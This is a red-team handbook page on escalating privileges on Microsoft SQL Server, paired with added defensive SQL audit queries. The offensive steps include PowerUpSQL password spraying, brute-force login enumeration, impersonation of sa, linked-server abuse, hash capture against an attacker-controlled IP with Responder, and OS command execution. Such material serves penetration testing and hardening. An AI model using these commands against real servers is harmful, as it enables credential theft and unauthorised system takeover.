The Red Team Vade Mecum
Privilege Escalation

Initial Foothold

After you have found the SQL servers in the environment, the next step is to gain an initial foothold on them. The goal at this stage is to obtain a SQL login.

Default passwords

This command launches a default password test against the SQL server using PowerUpSQL:

>> Get-SQLInstanceDomain | Invoke-SQLAuditDefaultLoginPw
or
>> Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw

To test for weak passwords:

>> Get-SQLInstanceScanUDP | Invoke-SQLAuditWeakLoginPw    (from an unauthenticated user's perspective)
>> Get-SQLInstanceDomain | Invoke-SQLAuditWeakLoginPw     (from a domain user's perspective)

If you already have a set of domain credentials, they may also work on the SQL server. You can test this like so:

>> Get-SQLInstanceScanUDP | Get-SQLConnectionTestThreaded -Username username -Password password    (credentials supplied manually)
or
>> Get-SQLInstanceDomain | Get-SQLConnectionTest
or
>> Get-SQLInstanceLocal | Get-SQLConnectionTest

To Sysadmin

Once you have initial access to a SQL server as some login, the next goal is to escalate to the sysadmin role.

Blind SQL Login Enumeration

We can begin to list all SQL server logins and try to test weak passwords on those accounts. We can do this with:

SELECT name FROM sys.syslogins
SELECT name FROM sys.server_principals

Note that this only returns a subset of the SQL logins: an unprivileged login only sees the principals it has permissions on.

To find more SQL logins, we can use SUSER_NAME, which returns the principal name for a given principal ID. We can enumerate all SQL logins by brute forcing the principal ID passed to SUSER_NAME.

SELECT SUSER_NAME(1)
SELECT SUSER_NAME(2)
...
SELECT SUSER_NAME(100)
...

We can then begin to password spray or brute force these accounts.

This can be automated with PowerUpSQL:

>> Get-SQLFuzzServerLogin -Instance ComputerName\InstanceName
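A DBA-side counterpart to the default-password and login-enumeration checks above, added here as an example and not part of the original page or of PowerUpSQL: from a sysadmin connection the full login list is visible and PWDCOMPARE can test each SQL login's stored hash against a candidate list. The candidate values in the table variable are constructed for illustration.

```sql
-- Added example (not from the original page): a sysadmin-side audit of the same
-- weaknesses the attacker-side checks above look for.
-- PWDCOMPARE reads sys.sql_logins.password_hash, so CONTROL SERVER is required.
-- The candidate list is constructed for illustration; extend it for your estate.
DECLARE @candidates TABLE (pw NVARCHAR(128));
INSERT INTO @candidates (pw) VALUES (N''), (N'sa'), (N'password'), (N'Password1');

-- 1. SQL logins whose password equals one of the candidate values
--    (an empty string finds blank passwords).
SELECT l.name, c.pw AS matched_candidate, l.is_disabled
FROM sys.sql_logins AS l
CROSS JOIN @candidates AS c
WHERE PWDCOMPARE(c.pw, l.password_hash) = 1;

-- 2. SQL logins that bypass the Windows password policy or never expire:
--    these are the ones a spray against the SUSER_NAME-enumerated list hits.
SELECT name, is_policy_checked, is_expiration_checked, is_disabled
FROM sys.sql_logins
WHERE is_policy_checked = 0 OR is_expiration_checked = 0;

-- 3. The complete login list (SQL logins, Windows logins, Windows groups),
--    i.e. everything a SUSER_NAME brute force could reveal, so the review is
--    not limited to the subset a low-privileged login can see.
SELECT principal_id, name, type_desc, is_disabled
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')
ORDER BY principal_id;
```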

Impersonation

There is a feature in SQL Server that allows a less privileged user to impersonate another login with more access. For impersonation itself, the queries/commands that can be executed are not limited in any way, but for command execution the database has to be configured as TRUSTWORTHY.

We cannot enumerate which logins we can impersonate because of our unprivileged position, but we can list the logins that have granted impersonation with this:

SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'

To manually check whether you can impersonate a login (sa in our case), issue these commands and compare the output before and after the EXECUTE AS:

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
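The defender's view of the same escalation path, added here as an example and not part of the original page: it joins on major_id (the impersonated login) rather than the grantor, so each row shows who may become whom and whether the target is sysadmin, and it lists TRUSTWORTHY databases owned by a sysadmin. The login and database names in the remediation templates are placeholders.

```sql
-- Added example (not from the original page): find the IMPERSONATE grants and
-- TRUSTWORTHY databases that make the escalation above possible. Run as sysadmin.

-- 1. Server-level IMPERSONATE grants: grantee -> impersonated login, flagging
--    the case that matters most (the target is a member of sysadmin).
SELECT grantee.name AS grantee_login,
       target.name  AS impersonated_login,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin,
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON p.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals AS target  ON p.major_id = target.principal_id
WHERE p.permission_name = 'IMPERSONATE'
  AND p.class_desc = 'SERVER_PRINCIPAL';

-- 2. Databases marked TRUSTWORTHY and owned by a sysadmin: inside such a
--    database, impersonating dbo reaches server-level rights.
SELECT d.name AS database_name,
       SUSER_SNAME(d.owner_sid) AS owner_login,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND d.name <> 'msdb';   -- msdb is TRUSTWORTHY by design

-- 3. Remediation templates (placeholder names; run deliberately, one at a time):
-- REVOKE IMPERSONATE ON LOGIN::[sa] FROM [low_priv_login];
-- ALTER DATABASE [app_db] SET TRUSTWORTHY OFF;
```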

Database Links

A database link is a persistent connection between two SQL servers. It allows server A to query server B and pull data from it (and vice versa) without a user being logged in.

Database links can be configured to run as the currently logged-in user, but in some cases they are configured to run in another user's context, which leads to privilege escalation if that context is a highly privileged login such as sa.

To query information from a linked server, we can use OPENQUERY. Also note that OPENQUERY is available to everyone.

To find linked servers, we can use

EXEC sp_linkedservers

and to run a query on a linked server

SELECT version FROM OPENQUERY("linkedserver", 'SELECT @@version AS version')

From there, we can run queries to determine the execution context on the remote server. If it is privileged, such as sa, we may be able to read sensitive information or get code execution via xp_cmdshell.
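An inventory of linked servers and the credential each one uses, added here as an example and not part of the original page: the risky configuration described above is a link whose catch-all mapping (local_principal_id = 0 in sys.linked_logins) points at a fixed remote login, because then every local login reaches the remote server as that account. The server name in the remediation templates is a placeholder.

```sql
-- Added example (not from the original page): which linked servers exist, what
-- they can do, and in whose context each local login crosses them. Run as sysadmin.
SELECT s.name AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,       -- 1 = EXEC ... AT [server] is possible
       s.is_data_access_enabled,   -- 1 = OPENQUERY against this link works
       COALESCE(lp.name, '<all other logins>') AS local_login,
       CASE
         WHEN ll.uses_self_credential = 1 THEN 'current login (pass-through)'
         WHEN ll.remote_name IS NULL     THEN 'no mapping (access denied)'
         ELSE 'fixed remote login: ' + ll.remote_name
       END AS remote_context
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- The rows to fix first: a catch-all mapping to a fixed remote login means any
-- local login, however unprivileged, runs on the remote side as that account.
SELECT s.name AS linked_server, ll.remote_name, s.is_rpc_out_enabled
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
  AND ll.local_principal_id = 0
  AND ll.uses_self_credential = 0
  AND ll.remote_name IS NOT NULL;

-- Remediation templates (placeholder server name):
-- EXEC sp_droplinkedsrvlogin @rmtsrvname = N'LINKED', @locallogin = NULL;   -- drop the catch-all mapping
-- EXEC sp_serveroption @server = N'LINKED', @optname = 'rpc out', @optvalue = 'false';
```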

UNC Path Injection

If a SQL server fetches a file from a UNC path, the remote file is retrieved in the context of the service account running SQL Server. If we can force the SQL server to authenticate to a UNC path we control, we may be able to capture the service account's NetNTLM hash and either crack or relay it.

If the attack is successful, we become a DBA or a local admin.

We can use PowerUpSQL and Inveigh for this:

Get-SQLServiceAccountPwHashes -Verbose -TimeOut 20 -CaptureIp attacker_controlled_IP

Or we can setup responder:

sudo responder -I tap0

OS Command Execution

With PowerUpSQL:

>> $Targets | Invoke-SQLOSCLR -Verbose -Command "Whoami"
>> $Targets | Invoke-SQLOSOle -Verbose -Command "Whoami"
>> $Targets | Invoke-SQLOSR -Verbose -Command "Whoami"

When executing OS commands through SQL Server, those commands are executed in the context of the service account.
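A check of the OS-execution surface and the account it inherits, added here as an example and not part of the original page or of PowerUpSQL: the four configuration options correspond to the mechanisms behind the xp_cmdshell, CLR, OLE and R routes above, and the service account query shows the identity that both these commands and the UNC path fetch in the previous section run as.

```sql
-- Added example (not from the original page): which OS-execution routes are
-- enabled on the instance, and which account they would run as. Run as sysadmin;
-- sys.dm_server_services requires SQL Server 2008 R2 SP1 or later.

-- 1. Configuration options that each open an OS command path.
SELECT name, value_in_use,
       CASE WHEN value_in_use = 1 THEN 'ENABLED - review' ELSE 'disabled' END AS status
FROM sys.configurations
WHERE name IN ('xp_cmdshell',                -- xp_cmdshell
               'Ole Automation Procedures',  -- sp_OACreate / sp_OAMethod (OLE route)
               'clr enabled',                -- user CLR assemblies (CLR route)
               'external scripts enabled');  -- sp_execute_external_script (R/Python route)

-- 2. The service account every one of those commands inherits. A local
--    Administrator or Domain Admin here turns a SQL-side foothold into host or
--    domain compromise; a virtual account or gMSA limits the blast radius.
SELECT servicename, service_account, startup_type_desc
FROM sys.dm_server_services;

-- 3. User-defined CLR assemblies in the current database that are allowed to
--    leave the sandbox; these are the carriers for the CLR route.
SELECT name, permission_set_desc, create_date
FROM sys.assemblies
WHERE is_user_defined = 1
  AND permission_set_desc <> 'SAFE_ACCESS';

-- 4. Remediation template for an option that is not needed:
-- EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
```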

MITM

If the SQL server communications are unencrypted, we may be able to inject our own queries and create our own SQL login.

Tools to automate this are:

https://gist.github.com/anonymous/edb02df90942dc4df0e41f3cbb78660b
https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler

Last updated 3 years ago